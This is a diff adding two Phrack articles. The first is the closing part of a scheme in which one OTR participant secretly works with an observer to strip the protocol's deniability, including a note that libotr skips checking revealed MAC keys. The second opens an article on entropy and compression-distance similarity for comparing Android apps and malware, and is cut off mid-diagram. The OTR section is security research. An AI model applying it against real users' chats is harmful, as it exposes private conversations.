+O -------- <OT> -------------> A   | Compute MAC_m2'(AES_c(X_B)) using
+            .                      | SFE. Both receive the result.
+            .                      |
+            .                     /
+O <----- eval(C3) ------------ A /
+O --------- MAC -------------> A/
+
+Now A and O are convinced that the key exchange with B succeeded. But they
+still need to convince B that everything is OK. In particular, OTR mandates
+that A should compute
+
+M_A = MAC_m1'(g^ao, g^x, pub_A, keyid_A)
+X_A = pub_A, keyid_A, sig_A(M_A)
+
+and then send AES_c'(X_A), MAC_m2'(AES_c'(X_A)) over to B. Computing the
+AES part can be done by A, because A knows the key c'. But for computing
+the MAC, A and O again need to cooperate. First, A sends AES_c'(X_A) over
+to O. Then O prepares a circuit C4, which computes:
+
+C4(o, a, AES_c'(X_A)) = MAC_m2'(AES_c'(X_A))
+
+Using oblivious transfers, Alice obtains the keys for her inputs from O.
+After evaluating the circuit, A and O obtain MAC_m2'(AES_c'(X_A)).
+
+O <----- AES_c'(X_A) --------  A\
+O --------- C4 --------------> A \
+                                  \
+O -------- <OT> -------------> A   |
+O <------- <OT> -------------- A   | Compute MAC_m2'(AES_c'(X_A)). Both
+O -------- <OT> -------------> A   | parties receive the value.
+            .                      |
+            .                     /
+O <----- eval(C4) ------------ A /
+O -- MAC_m2'(AES_c'(X_A)) ---> A/
+
+That's it. A can now send all the required values to B.
+
+                              - AES_c'(X_A), MAC_m2'(AES_c'(X_A)) -> B
+
+B verifies all the stuff (just like A did but without the SFE) and the
+key exchange is done.
+
+---------[ 4.4.2 - Message Exchange
+
+Once they have exchanged their initial key material, Alice and Bob can
+exchange actual messages. Suppose, Alice wants to send a message to Bob;
+we'll restrict ourselves to that scenario. Receiving messages works
+similar.
+
+Alice now does the following (from the OTR protocol spec [2]):
+Picks the most recent of her own Diffie-Hellman encryption keys that Bob
+has acknowledged receiving (by using it in a Data Message, or failing
+that, in the AKE). Let key_A be that key, and let keyid_A be its serial
+number.
+
+If the above key is Alice's most recent key, she generates a new
+Diffie-Hellman key (next_dh), to get the serial number keyid_A+1.
+
+To do this, Alice again needs to cooperate with the observing party.
+The steps are exactly the same as we have already seen in the initial
+key-exchange:
+
+O <------- g^a -------------- A
+O -------- g^o -------------> A
+
+Alice now uses g^ao as next_dh. When she computed next_dh, Alice
+picks the most recent of Bob's Diffie-Hellman encryption keys that she has
+received from him (either in a Data Message or in the AKE). Let key_B be
+that key, and let keyid_B be its serial number.
+
+Now Alice would actually need to use Diffie-Hellman to compute a fresh
+shared key with Bob, which she can use to derive the encryption and MAC
+key. But as she doesn't really know the private exponent (she knows g^ao,
+a and g^a, but not ao), she again needs to cooperate with O. So here we go:
+
+O prepares a circuit C1:
+
+C1(o, a, mask) = (ek, mk) XOR mask
+
+The circuit will compute both, ek and mk (the encryption and MAC keys),
+blinded with some value chosen by Alice. The result will be supplied only
+to the observing party. Alice will keep the value of mask. In a number of
+oblivious transfers, Alice receives the keys for her input values from O.
+
+O --------- C1 ------------> A\
+                               \
+O -------- <OT> -----------> A  \
+O <------- <OT> ------------ A   |
+O -------- <OT> -----------> A   | Compute (ek, mk) XOR mask using SFE.
+            .                    | Only O receives the result.
+            .                    |
+            .                   /
+O <----- eval(C1) ---------- A /
+
+Alice now picks a value ctr, so that (key_A, key_B, ctr) is unique. The
+ctr value is needed, because AES is going to be used in counter mode to
+encrypt Alice's payload. The next step for Alice is to encrypt her message.
+As she doesn't know the encryption key, O prepares a circuit C2 for her:
+
+C2(ek_o, ek_a, ctr, msg) = AES-CTR_ek,ctr(msg)
+
+The inputs ek_o and ek_a denote O's and A's knowledge about ek, which is
+ek XOR mask in O's case and mask in A's case. The result of the circuit
+will only be provided to A (i.e. A just doesn't send it over to O). In a
+number of oblivious transfers, Alice receives the keys for her input
+values from O.
+
+O --------- C2 ------------> A\
+                               \
+O -------- <OT> -----------> A  \
+O <------- <OT> ------------ A   |
+O -------- <OT> -----------> A   | Encrypt msg using SFE. Only A
+            .                    | receives the result.
+            .                   /
+            .                  /
+
+Now Alice can compute:
+
+T_A = (keyid_A, keyid_B, next_dh, ctr, AES-CTR_ek,ctr(msg))
+
+T_A already contains Alice's message, but she still needs to MAC it. This
+is again done by A and O together. O prepares a circuit C3:
+
+C3(mk_o, mk_a, T_A) = MAC_mk(T_A)
+
+O --------- C3 --------------> A\
+                                 \
+O -------- <OT> -------------> A  \
+O <------- <OT> -------------- A   | Compute MAC_mk(T_A). Both
+O -------- <OT> -------------> A   | parties receive the value.
+            .                      |
+            .                     /
+O <----- eval(C3) -----------  A /
+O ----- MAC_mk(T_A) -------->  A/
+
+Please be aware that Alice will keep T_A secret. Although T_A doesn't
+contain any plaintext, Alice does not want to disclose it to the observing
+party. If she did, then her own deniability would also be gone.
+Also, the OTR protocol mandates that Alice should send her old MAC keys in
+plaintext to Bob, so that they can be considered public. If A and O wanted
+to, they could do that (by computing the old MAC key again and sharing the
+result). But as long as Bob doesn't check what Alice sent, she can just
+send garbage. Indeed, in its current version (libotr 3.2.0), the OTR
+implementation doesn't check the disclosed MAC keys. Consider the excerpt
+from proto.c, line 657:
+
+--- snip ---
+    /* Just skip over the revealed MAC keys, which we don't need.  They
+     * were published for deniability of transcripts. */
+    bufp += reveallen; lenp -= reveallen;
+--- snap ---
+
+So Alice can safely send:
+
+                             A -T_A,MAC_mk(T_A),oldmackeys=foobar-> B
+
+------[ 4.5 - What's Left
+
+We have seen that in a scenario where at least one party cooperates with
+the attacker, deniability is non-trivial. Our construction can be extended
+and adopted and we conjecture that it quite generally applies to deniable
+messaging protocols.
+
+Regarding performance: Yeah, we know that all the SFE voodoo can be quite
+expensive. Especially modular exponentiation in circuits is not really
+cheap. However, there are ways to optimize the basic scheme we have
+outlined here. If you're interested in that, you might wanna read [5] as an
+introduction. Also, refer to section 4.5.2, which outlines one particular
+optimization of our Diffie-Hellman-scheme. Regarding network latency: When
+looking at all the crypto protocols outlined in this article (especially at
+oblivious transfers), you will notice that often multiple messages need to
+be exchanged. If you need 3 messages for one oblivious transfer and you
+want to perform 128 oblivious transfers (for some 128-bit crypto key or
+so), then you end up with 384 messages being exchanged. In terms of network
+latency, that might be troublesome. However, there are two things that help
+us: first, we can perform oblivious transfers in parallel (i.e. still
+exchange three messages but every message now contains data for 128
+oblivious transfers). We can also precompute many values and exchange them
+before they are really needed (random values for instance).
+
+---------[ 4.5.1 - FAQ
+
+Q: This is all bullshit! I could just share my private keys with the
+   police, and that would also kill deniability!
+
+   Yep. And the police would then be able to impersonate you. One of our
+   key points is that you don't need to trust the observing party, neither
+   need they to trust you.
+
+A: But the observing party won't be able to prove anything in court!
+
+   Well, yes and no. In a constitutional state you'd need to actually prove
+   stuff in court. Unfortunately, such states are rare. But even if you
+   live in such a state, then the observing party could be the judge.
+
+Q: But all the conversations that I had before my peer cooperated with the
+   observing party are deniable, right?
+
+A: Yes, unless the observing party sniffed your traffic (if you used a
+   decent anonymizer, this is unlikely).
+
+Q: Wait, the observing party so far only learned that *somebody* has sent
+   a message. But how do they know it was the person that I tell them it
+   was?
+
+   Good question. This knowledge is generated during the initial key
+   exchange of OTR. To be precise, the observing party and the backstabber
+   both learn the identity of the conversation peer when he signs his
+   key-exchange proposal with his DSA key. The observing party also sees
+   that and as they track all subsequent key-exchanges, they can build a
+   "chain of evidence".
+
+Q: But doesn't [4] already kill the deniability of OTR?
+
+A: Ha, even better question! At least it attacks the strong deniability of
+   OTR. However, our scheme also attacks the weak deniability. Furthermore,
+   the attacker in [4] has far more capabilities than in our model. In [4],
+   the attacker is able to arbitrarily read and modify network traffic. In
+   our model, the attacker can rely on the cooperation with one of the two
+   conversation partners.
+
+Q: OK, I'm convinced. Is there any implementation?
+
+A: You're welcome to build one ;) See section 4.5.2 for details.
+
+---------[ 4.5.2 - How to Implement?
+
+If you want to implement the scheme outlined above, first of all, you need
+some framework for secure function evaluation. There are a number of
+implementations out there, for instance Fairplay [6] or TASTY [5]. Once you
+got your SFE framework running, you need to implement all the functions
+that need to be computed jointly. The Diffie-Hellman stuff is probably most
+efficient when implemented using a homomorphic cryptosystem (such as
+RSA or ElGamal maybe). Now you may ask: how does a multiplicatively
+homomorphic scheme help us computing DH keys? Well. There's some nice
+optimization, which basically reduces the modular exponentiation to a
+modular multiplication:
+
+Alice picks some random j and sends g^(ab+bj) over to the observing party.
+The observing party sends g^o.
+
+                           A <---- g^b ------------ B
+O <------ g^(ab+j) ------  A
+O  -------- g^o ---------> A
+
+Note that Bob cannot compute g^abo, because Alice's value is "blinded" with
+j. Alice cannot do so neither; she doesn't know o. Bob however can compute
+g^(abo+jo). Alice can compute g^jo and also g^-jo, because she knows j. If
+Alice would send g^-jo to O, then O could compute
+
+g^(abo+jo) * g^-jo = g^abo
+
+This is only one modular multiplication. So instead of doing a whole
+modular exponentiation, the circuit that Alice and the observing party
+jointly compute does roughly the following:
+
+C(o, a) = derive_keys(o*a)
+
+Where the function derive_keys() is the OTR key derivation function
+(hashing the common key in different ways to generate symmetric key
+material), O's input value will look like g^(abo+jo) and A's input value
+will look like g^-jo.
+
+All the symmetric operations (hashes and block ciphers) should probably be
+implemented as circuits, for instance using Fairplay. Both SFE schemes
+(circuits and homomorphic crypto) can be combined using the TASTY approach.
+
+--[ 5 - References
+
+[1] http://www-ee.stanford.edu/~hellman/publications/24.pdf
+[2] http://www.cypherpunks.ca/otr/Protocol-v2-3.0.0.html
+[3] http://eprint.iacr.org/2004/175.pdf
+[4] http://www.jbonneau.com/OTR_analysis.pdf
+[5] http://eprint.iacr.org/2010/365.pdf
+[6] http://www.pinkas.net/PAPERS/MNPS.pdf
+[7] http://tinyurl.com/84z7wpu
+
+--[ 6 - Greetingz
+
+First of all I have to give a big shout to bruhns, who developed this stuff
+together with me! There's this one person, which I'd like to say thanks for
+everything (and that's quite a lot). Unfortunately, i cannot name this
+person here. 291646a6d004d800b1bc61ba945c9cb46422f8ac. Also a big thanks to
+Phrack staff for reading through all this and supplying me with real
+helpful feedback!
+
+Greetingz go out to the following awesome people in no particular order:
+ths, fabs, joern, nowin, trapflag, jenny, twice#11
+
+--[ EOF
diff --git a/phrack68/15.txt b/phrack68/15.txt
new file mode 100644
index 0000000..ff1f71b
--- /dev/null
+++ b/phrack68/15.txt
@@ -0,0 +1,25975 @@
+                              ==Phrack Inc.==
+
+                Volume 0x0e, Issue 0x44, Phile #0x0f of 0x13
+
+|=-----------------------------------------------------------------------=|
+|=------------------=[ Similarities for Fun & Profit ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------------=[ Pouik (Androguard Team) and G0rfi3ld ]=--------------=|
+|=------------------=[ d@t0t0.fr / g0rfi3ld@gmail.com ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+
+
+1/ Introduction
+    1.1 Complexity of a sequence
+    1.2 Histograms and classical Shannon Entropy
+    1.3 From the Classical Entropy towards Descriptional Entropy
+    1.4 Normalized Compression Distance (NCD)
+2/ Similarities
+    2.1 Between two sets of elements
+    2.2 In a set of elements
+3/ Real World: Android
+    3.1 Similarities between two applications
+    3.2 Differences between two applications
+    3.3 Looking for a signature in applications
+4/ Conclusion
+5/ References
+6/ Code
+
+
+--[ 1 - Introduction
+
+How can we verify that two numerical objects are identical? It's easy, you
+just have to compare all characters, one by one. But how can we say that
+two numerical objects are "similar" but not identical?
+
+Can we define a measure of "similarity", which will give ipso facto a
+measure of "dissimilarity"?
+
+But what are these numerical files that we want to analyze or compare? It
+could be anything, from pictures to numerical data files. We will focus in
+this work on goodware and malware, (a goodware is not a malware :). So, if
+the numerical objects are software, can we define a measure of similarity
+and how? And why? We will see this.
+
+Our problem can be simply defined as: How can we choose quickly, from a set
+M of known software files {m1, ..., mn}, with n >= 1, the subset of the
+files of M that are the "most similar" to a target A? And how can we find
+quickly interesting differences without using a direct approach like graph
+isomorphism [21, 25] between two similar but different applications?
+
+We will show you how we can use a filtering tactic to select the best (i.e.
+the "most similar" to a target A) files out of the malware set M. We
+propose the use of two different tactics, using the entropy as a first
+filtering tactic to filter the set M and the Normalized Compression
+Distance (NCD) for a second filtering tactic. We also propose a new entropy
+which is a simple generalization of the classical Shannon entropy. We call
+this entropy the "descriptional entropy", which to the authors knowledge,
+is presented here for the first time.
+
+While the tools that we present here are truly generic, i.e. they can be
+used with any files, we will give some examples through the analysis and
+comparison of Android applications.
+
+----[ 1.1 Complexity of a sequence
+
+We want to compare DNA sequences [24], music files or pictures [20].
+We need a notion of the "complexity" of a sequence, to be able to compare
+them, to sort them or to index them. But what is a complex sequence or how
+do we define a complex sequence? There are lots of situations where we need
+a tool to answer. To be more exact, we need a computable measure of the
+complexity of a sequence, to index for example a set of files. The sequence
+can be the bytes of a picture, a DNA sequence, a source code or an
+executable file; in other words, whatever can be stored in a file. In this
+paper, we will say sequence, for any sequence of ASCII characters.
+
+So, can we define the "complexity" of a sequence? Let us give a toy
+example, we consider the four sequences:
+
+    - S1 = "aaabbb"
+    - S2 = "ababab"
+    - S3 = "bbbaaa"
+    - S4 = "abbaab"
+
+Intuition tells us that:
+
+    - S1 and S3 are more similar than S1 and S2 or S2 and S3.
+    - S1 is more "simple" than S2.
+    - S1, S2 and S3 are more "simple" than S4.
+
+It is easy to see that S1 is the reverse of S3, so it could be interesting
+for any function Comp() defined as a measure of the complexity of a
+sequence to verify that Comp(S1) = Comp(S3).
+
+----[ 1.2 Histograms and classical Shannon Entropy
+
+Let S be a sequence of characters, with an "alphabet" of n different
+symbols (generally characters). Let pi be the computed probability of
+occurrence of each of the n character in S, we will call the histogram
+vector Hist = {p1, ..., pn} and then the classical Shannon entropy of the
+sequence S is defined by:
+
+               n
+              __
+              \
+    H(S)= -   /  pi log(pi)
+              |__
+              i=1
+
+(where log(x) is the logarithmic function in base 10).
+
+In our toy example, S1 = "aaabbb", S2 = "ababba" and S3 = "bbbaaa", the
+alphabet is {"a", "b"}. They have a same histogram vector entropy:
+
+    Hist(S1) = Hist(S2) = Hist(S3) = {1/2, 1/2}
+
+which will give the same entropy:
+
+    H(S1) = H(S2) = H(S3) = 1.
+
+If we use the classical Shannon entropy H(), the equation holds as
+H(S1) = H(S3). However we also have H(S1) = H(S2) which contradicts 'S1 is
+more simple than S2'. So the function is not suitable.
+
+Let's see another problem with the classical Shannon entropy: if S is a
+sequence of characters with S...S a concatenation of S and H() the Shannon
+entropy, then we have H(S) = H(SS) = H(SSS) = H(S...S). This is not really
+good for our purposes!
+
+We will see that we can do better with a generalization of the Shannon
+entropy which we will call "Descriptional Entropy".
+
+----[ 1.3 From the Classical Shannon Entropy towards the Descriptional 
+          Entropy
+
+A lot of ways to measure the complexity of a sequence have been proposed.
+For example, the Lempel-Ziv complexity [29,30] is defined as the number of
+different subsequences (patterns) in a sequence when we apply the LZ
+algorithm.
+
+The sequence complexity, or the complexity index, of a sequence S = s1...sn
+is defined as the number of different subsequences in S [31,32].
+
+In all cases we obtain a number which is difficult to use, or we have to
+take the histogram vector. But to compare two histogram vectors of unequal
+size is not easy. We propose here a new approach.
+
+Given a complexity measure based on the count of different subsequences,
+and if we have N different subsequences, we can compute the histogram
+vector Hist(S) = {P1, ..., PN} for this set, with P1+...PN=1 of course. So
+now we can compute the entropy of this histogram vector; we propose to call
+this entropy the "Descriptional Entropy" of a sequence:
+
+                     N
+                     __
+                     \
+    Hd(Hist(S))= -   /  Pi log(Pi)
+                     |__
+                     i=1
+
+To simplify we will write Hd(S) for Hd(Hist(S)). From now we will use the
+log2(x) function, i.e. the log base 2 function.
+
+Let us show it with the toy example, again, S1 = "aaabbb", S2 = "ababba",
+S3 = "bbbaaa" and S4 = "abbaab". If we choose to count all different
+subsequences we will have (to simplify we neglect the "empty" sequence
+which is used sometimes):
+
+(1) For S1 = "aaabbb": the subsequence set is (in alphabetical order)
+
+    {a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb}
+
+    and the histogram vector:
+    Hist(S1)={1/7,2/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,
+              1/7,2/21,1/21}.
+
+    If we sort it we have:
+    {1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21,
+    1/7,1/7}
+
+    and so the descriptional entropy will be (remember: we use the base 2
+    logarithmic function log2(x)):
+    Hd(S1) = - ( 1/21 log2(1/21) x 11 + 2/21 log2(2/21) x 2 + 1/7 log2(1/7)
+                 x 2 )
+    Hd(S1) =  11/21 log2(21) + 4/21 log2(21/2) + 2/7 log2(7)
+    Hd(S1) =  11/21 log2(21) + 4/21 log2(21) - 4/21 log2(2) + 2/7 log2(7)
+    Hd(S1) =  5/7 log2(21) - 4/21 log2(2) + 2/7 log2(7)
+
+    which gives:
+    Hd(S1) = 3.74899
+
+
+(2) For S2 = "ababab": the subsequence set is (in alphabetical order):
+
+    {a,ab,aba,abab,ababa,ababab,b,ba,bab,baba,babab}
+
+    and the histogram vector:
+    Hist(S2)= {1/7,1/7,2/21,2/21,1/21,1/21,1/7,2/21,2/21,1/21,1/21}
+
+    If we sort it we have:
+    {1/21,1/21,1/21,1/21,2/21,2/21,2/21,2/21,1/7,1/7,1/7}
+
+    and the descriptional entropy will be:
+    Hd(S2) = 3 log2(7) / 7 + 8 log2(21/2) / 21  + 4 log2(21) / 21
+
+    which gives:
+    Hd(S2) = 3.3321
+
+(3) For S3 = "bbbaaa": the subsequence set is (in alphabetical order)
+
+    {a,aa,aaa,aaab,aaabb,aaabbb,aab,aabb,aabbb,ab,abb,abbb,b,bb,bbb}
+
+    and the histogram vector:
+    Hist(S3)={1/7,2/21,1/21,1/7,1/21,1/21,1/21,2/21,1/21,1/21,1/21,
+              1/21,1/21,1/21,1/21}
+
+    If components are sorted we have:
+    {1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,2/21,2/21,
+    1/7,1/7}
+
+    and the descriptional entropy will be:
+    Hd(S3) = 2 log2(7))/7 + 4 log2(21/2))/ 21 + 11 log2(21)/21
+
+    which gives:
+    Hd(S3) = 3.74899
+
+(4) For S4 = "abbaab": the subsequence set is (in alphabetical order)
+
+    {a,aa,aab,ab,abb,abba,abbaa,abbaab,b,ba,baa,baab,bb,bba,bbaa,bbaab}
+
+    and the histogram vector:
+    Hist(S4) = {1/7,1/21,1/21,2/21,1/21,1/21,1/21,1/21,1/7,1/21,
+                1/21,1/21,1/21,1/21,1/21,1/21}
+
+
+    If components are sorted we have:
+    {1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,1/21,
+    2/21,1/7,1/7}
+
+    and the descriptional entropy will be:
+    Hd(S4) = 2 log2(7) / 7 + 2 log2(21/2) / 21 + 13 log(21) / 21
+
+    which gives:
+    Hd(S4) = 3.84423
+
+So, we have:
+
+    Hd(S2) = 3.3321 < Hd(S1) = Hd(S3) = 3.74899 < Hd(S4) = 3.84423.
+
+The result Hd(S1) = Hd(S3) = 3.74899 is expected. However, the result
+Hd(S2) = 3.3321 < Hd(S1) is a little bit surprising, but the whole set of
+inequalities is correct. S4 is more "complex" than S1, S2 and S3.
+
+Let us give another simple example, if we choose S5 = "bbbbbaaaaa" and
+S6 = S5S5 = "bbbbbaaaaabbbbbaaaaa". We will have:
+
+    Hd(S5) = 4.82265 and Hd(S6) = 6.68825,
+
+and it is not so difficult to prove that:
+
+for any sequence S:
+    Hd(S) < Hd(SS) < Hd(SSS) < Hd(S......S).
+
+This sounds good :)
+
+However there is a drawback since for a very long sequence S the
+(practical) computational complexity of the computation of Hd(S) is not
+cheap. Well, it's true, of course. We could probably find a fast(er)
+algorithm, based for example on some variation of the Aho-Corasick,
+Boyer-Moore or Knuth-Morris-Pratt algorithms. We can also say that we only
+consider subsequences of length bounded by a suitable integer k.
+
+----[ 1.4 Normalized Compression Distance (NCD)
+
+The Kolmogorov complexity is a very interesting concept and it has a lot of
+applications [18,23]. We present here this concept to explain the power of
+Normalized Compression Distance (NCD).
+
+Let us cite Wikipedia [26]: "In algorithmic information theory (a subfield
+of computer science), the Kolmogorov complexity of an object, such as a
+piece of text, is a measure of the computational resources needed to
+specify the object. It is named after Soviet Russian mathematician Andrey
+Kolmogorov. Kolmogorov complexity is also known as descriptive complexity,
+Kolmogorov Chaitin complexity, algorithmic entropy, or program-size
+complexity."
+
+Well, it is a very good abstract. Unfortunately, The Kolmogorov complexity
+K(S) of a sequence S is not computable, so we can just approximate it.
+The use of any compression algorithm gives a trivial and evident upper
+bound of K(S). Read the book [22] for a deep and modern presentation and
+for applications. (Yes there are applications).
+
+We switch now to the NCD, which is always computable.
+
+To be able to use the Kolmogorov complexity we need to extend the
+informational distance to have a normalized value which indicates the
+similarities or dissimilarities between two elements/strings. Let us recall
+what a distance is.
+
+Wikipedia says: "...a distance function on a given set M is a
+                 function d: MxM -> R, the set of real numbers, that
+                 satisfies the following conditions:
+
+    a) d(x,y) >= 0, and d(x,y) = 0 if and only if x = y. (Distance is
+    positive between two different points, and is zero precisely from a
+    point to itself.)
+    b) It is symmetric: d(x,y) = d(y,x). (The distance between x and y is
+    the same in either direction.)
+    c) It satisfies the triangle inequality: d(x,z) <= d(x,y) + d(y,z).
+    (The distance between two points is the shortest distance along any
+    path).
+
+Such a distance function is known as a metric."
+
+Suppose we have two sequences x and y. We consider the concatenated
+sequence xy, and a compressor algorithm Comp with L(Comp(S)) the length of
+the compressed string, i.e. the number of bytes of the compressed string.
+
+The main idea of the NCD [17,33] is that L(Comp(xy)) will be almost equal
+to L(Comp(x)) if x = y. And L(Comp(xy)) will be close to L(Comp(x)) if x
+and y are similar without being equal.
+
+Let us give now the definition of dNCD(x,y):
+
+
+                         (L(Comp(x|y)) - min{L(Comp(x)), L(Comp(y))})
+        - dNCD(x, y) = -------------------------------------------------
+                                max{L(Comp(x)), L(Comp(y))}
+
+
+This formula returns a value from 0.0 (maximally similar) to 1.0 (maximally
+dissimilar). 1.0? Oh yes if the compressor works correctly, but practically
+we can manage this.
+
+--[ 2 - Similarities
+
+In the next two sections, we will present two algorithms which can be used
+with any set of elements. Elsim (included in the code archive at the end of
+this paper) is our implementation of those algorithms. It is open source
+software (LGPL), and with it you can compute similarities between any
+"described" elements :)
+
+----[ 2.1 Between 2 sets of elements
+
+In this part we will describe how we can create a generic algorithm to
+search the similarities between 2 sets of elements. This algorithm can be
+used to compare all kind of elements if you are able to find a correct way
+to represent your data.
+
+For the comparison of our data, we will use the NCD, thus indirectly the
+Kolmogorov complexity. One of the major drawbacks [16] of the compression
+is the "time" required :) The tool can be powerful, but if you use a
+compression algorithm like LZMA, you are limited to "hello world" problems
+due to the speed of the compression. You need to choose carefully your
+(lossless) compressor.
+
+A compressor C is "normal" if the following properties (inequalities) are
+satisfied [17]:
+
+    1) Idempotency: C(xx) = C(x), and C(E) = 0,
+        where E is the empty string.
+    2) Monotonicity: C(xy) >= C(x).
+    3) Symmetry: C(xy) = C(yx).
+    4) Distributivity: C(xy) + C(z) <= C(xz) + C(yz).
+
+The important theorem from [18] reveals the power of the dNCD distance:
+
+"if the compressor C is normal, then the dNCD is a normalized admissible
+distance satisfying the metric inequalities that is, a similarity metric."
+
+With this theorem, we can use the NCD as a simple tool to measure the
+similarity between elements.
+
+We have performed tests on different compressors to test them in respect to
+both the previous properties and their speed. If the algorithm is too slow
+it will be really useless for practical purposes. We chose to compress
+random signatures (see 3.1) because it's close to our application domain
+(see 3).
+
+##########################################################################
+Property | Number of success | size of final compression | speed (seconds)
+##########################################################################
+d@t0t0:~/elsim$ ./tests/test_similarity.py
+*  LZMA
+Idempotency         0/9             1167                    1.82118797
+Monotonicity        72/72           13258                   9.40736294
+Symetry             72/72           17380                   9.32561111
+Distributivity      504/504         214466                  133.67427087
+
+*  BZ2
+Idempotency         0/9             1947                    0.00075889
+Monotonicity        72/72           18248                   0.00626206
+Symetry             72/72           221744                  0.00735211
+Distributivity      504/504         279944                  0.09816098
+
+*  ZLIB
+Idempotency         0/9             1073                    0.00033116
+Monotonicity        72/72           11850                   0.00224590
+Symetry             72/72           15348                   0.00276113
+Distributivity      504/504         190386                  0.03468490
+
+*  XZ
+Idempotency         0/9             1900                    0.55278206
+Monotonicity        72/72           17544                   4.41346812
+Symetry             72/72           21008                   4.35566306
+Distributivity      504/504         269864                  61.70975709
+
+*  VCBLOCKSORT
+Idempotency         0/9             8129                    0.00140786
+Monotonicity        72/72           86960                   0.01695490
+Symetry             10/72           115168                  0.02190304
+Distributivity      504/504         1414896                 0.21149492
+
+*  SNAPPY
+Idempotency         0/9             1153                    0.00009203
+Monotonicity        72/72           12952                   0.00057387
+Symetry             72/72           17184                   0.00059295
+Distributivity      504/504         210952                  0.01117182
+###########################################################################
+
+Snappy [19] is really fast and respects, as do the others, the four
+conditions. It is interesting to see that the first property will never be
+satisfied by the NCD. This happens because in practice it is impossible to
+obtain those conditions even if we have close results (which is why the
+algorithm works :).
+
+It is possible to execute the similarity library in Elsim to use
+independently the Kolmogorov complexity and the NCD:
+
+###########################################
+In [1]: from elsim.similarity import similarity
+In [2]: s =
+similarity.SIMILARITY("./elsim/similarity/libsimilarity/libsimilarity.so")
+
+// change the type of compressor (bzip2)
+In [3]: s.set_compress_type( similarity.BZ2_COMPRESS )
+// Get the kolmogorov complexity (by using the compressor, so this function
+// returns the length of the compression
+In [4]: s.kolmogorov("W00T W00T PHRACK")
+Out[4]: (52L, 0)
+
+// Get the similarity distance between two strings
+In [5]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK")
+Out[5]: (0.057692307978868484, 0)
+In [6]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF")
+Out[6]: (0.17543859779834747, 0)
+In [7]: s.ncd("W00T W00T PHRACK", "HELLO WORLD")
+Out[7]: (0.23076923191547394, 0)
+// As you can see :
+//      - the elements of the first comparison are closer
+//        than the elements of the second comparison
+//      - the elements of the second comparison are closer
+//        than the elements of the third comparison
+//      - the result of the first comparison is not 0, that is why
+//        we don't respect the first property but practically it works
+//        because we are not far from 0
+
+// change the type of compressor (Snappy)
+In [8]: s.set_compress_type( similarity.SNAPPY_COMPRESS )
+In [9]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK")
+Out[9]: (0.6666666865348816, 0)
+In [10]: s.ncd("W00T W00T PHRACK", "W00T W00T PHRACK STAFF")
+Out[10]: (0.6818181872367859, 0)
+In [11]: s.ncd("W00T W00T PHRACK", "HELLO WORLD")
+Out[11]: (0.7777777910232544, 0)
+
+// As you can see, Snappy is very bad with such kind of strings, even if
+// the algorithm respects the dissimilarities between the comparison.
+
+// If we test this compressor with longer strings, and strings of
+// signatures (3.1), we have better results:
+In [12]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
+         "B[GP1]",
+         "B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]B[GP1]")
+Out[12]: (0.0784313753247261, 0)
+
+In [13]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
+         "B[GP1]",
+         "B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]")
+Out[13]: (0.11764705926179886, 0)
+
+In [14]: s.ncd("B[I]B[RF1]B[F0S]B[IF1]B[]B[]B[S]B[SS]B[RF0]B[]B[SP0I]"\
+         "B[GP1]",
+         "B[G]B[SGIGF0]B[RP1G]B[SP1I]B[SG]B[SSGP0]B[F1]B[P0SSGR]B[F1]"\
+         "B[SSSI]B[RF1P0R]B[GSP0RP0P0]B[GI]B[P1]B[I]B[GP1S]")
+Out[14]: (0.9270833134651184, 0)
+
+###########################################
+
+Snappy maybe the fastest algorithm but its rate compression is the worst.
+However, it is not of particular importance. Why? Because it is not a
+problem if the properties are respected. Moreover if you want an end value
+which respects more the idea of similarities, you can still switch to some
+other compressor, such as ZLIB, LZMA or BZ2.
+
+The first thing to do is to describe our "basic" element which will be used
+for a comparison. An element is composed of:
+        - a string
+        - a hash
+
+Oh wait, that's all? Yes, we need to compare strings and not other things.
+But the strings themselves will highly depend of your similarity problem.
+For example, if your problem is to compare two binaries, it's a bad idea to
+compare the listings corresponding to a specific function. You need to find
+the best way to transform your data into suitable strings, and it's
+probably the most difficult part. Of course it is not our job in this
+article:) It is not easy to transform your data to a string and it will be
+specific to each problem. For example, if your data is a chemical molecule
+you need probably to use SMILES to convert the structure to an ASCII string
+[34].
+
+Remember that you can't compare elements that easily, you really need a
+transformation because the Kolmogorov complexity is not magical. Using it
+requires the normalization of your data. Finally, the hash is only used to
+quickly remove the identical elements.
+
+The algorithm is the following one:
+
+    - input: A:set(), B:set()
+      where A and B are sets of elements
+
+    - output: I:set(), S:set(), N:set(), D:set(), Sk:set()
+      where I: identical elements, S: similar elements, N: new elements,
+      D: deleted elements, Sk: skipped elements
+
+    - Sk: Skipped elements by using a "filtering" function (helpful if we
+      wish to skip some elements from a set (small size, known element from
+      a library, etc.)
+
+    - Identify internal identical elements in each set
+
+    - I: Identify "identical" elements by the intersection of A and B
+
+    - Get all others elements by removing identical elements
+
+    - Perform the "NCD" between each element of A and B
+
+    - S: "Sort" all similarities elements by using a threshold
+
+    - N,D: Get all new/deleted elements if they are not present in one of
+      the previous sets
+
+The following diagram describes this algorithm:
+
+
+|--A--|                 |--B--|
+|  A1 |                 |  B1 |
+|  A2 |                 |  B2 |
+|  A3 |                 |  B3 |
+|--An-|                 |--Bn-|
+   |      |---------|      |
+   |- --->|FILTERING|<-----|
+          |---------|
+             |   |
+             |   |--------->|Sk|
+             |
+             |      |---------|
+             |----->|IDENTICAL|------>|I|
+                    |---------|
+                         |
+                         |
+                         |     |---|---use-->|Kolmogorov|
+                         |---->|NCD|
